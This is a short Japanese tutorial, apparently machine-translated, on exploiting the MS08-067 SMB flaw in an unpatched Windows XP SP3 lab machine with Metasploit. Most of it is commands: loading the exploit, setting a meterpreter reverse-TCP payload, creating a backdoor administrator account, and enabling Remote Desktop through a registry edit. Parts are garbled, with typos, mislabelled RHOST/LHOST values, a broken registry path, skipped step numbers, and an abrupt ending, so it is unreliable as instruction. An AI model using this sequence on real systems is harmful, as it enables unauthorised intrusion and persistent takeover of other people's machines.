WIN xpsp3システムでのMs08_067_netapiの脆弱性の悪用
Exploitation Ms08_067_netapi Vulnerability Win Xp Sp3 System
Ms08_067_netapiはMetasploitのやや古いオーバーフロー攻撃ペイロードであり、攻撃は比較的高い権限を取得できます1:準備:WINxp sp3システム(パッチなし) ダウンロードリンク: http://blog.csdn.net/sql_injection/article/details/47683419 kali ipを攻撃します:192.168.243.133 ターゲットマシンのIP:192.168.243.136 2:準備が完了したら、kaliを開き、ターミナルを開きますmetasploitのmsfconsoleフレームワーク コマンド:
msfconsole

service postgresql statr
3:検索してロードするMs08_067モジュール (1):searchコマンドを使用して、このモジュールを検索します。search ms08_067_netapi
(2):アプリケーションによって検索されたモジュールアドレス:use exploit/windows/smb/ms08_067_netapi

set payload windows/meterpreter/reverse_tcp
ロード後、設定する必要のあるパラメータを表示できます。
show options
次に、以下に示すように:

set RHOST attacked ip
set LHOST attacked ip
次に攻撃します:exploit

(1):ユーザーの作成:
user net username password /add
(2):右エスカレーション:
net localgroup administrators wmc /add


7:特権が発生した後、リモートでログインできますが、このポートはリモート接続に使用されるため、この時点で、ターゲットマシンがポート3389を開いているかどうかを確認します。 (1):開くかどうかを確認します。
netstat -na

(2):明らかにそうではないので、それを開きます:
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal' 'Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

8:次に、独自のローカルシステムを使用して、リモートで接続し、次のことを実行します。 (1)cmdを開き、リモート接続コマンドを入力します。




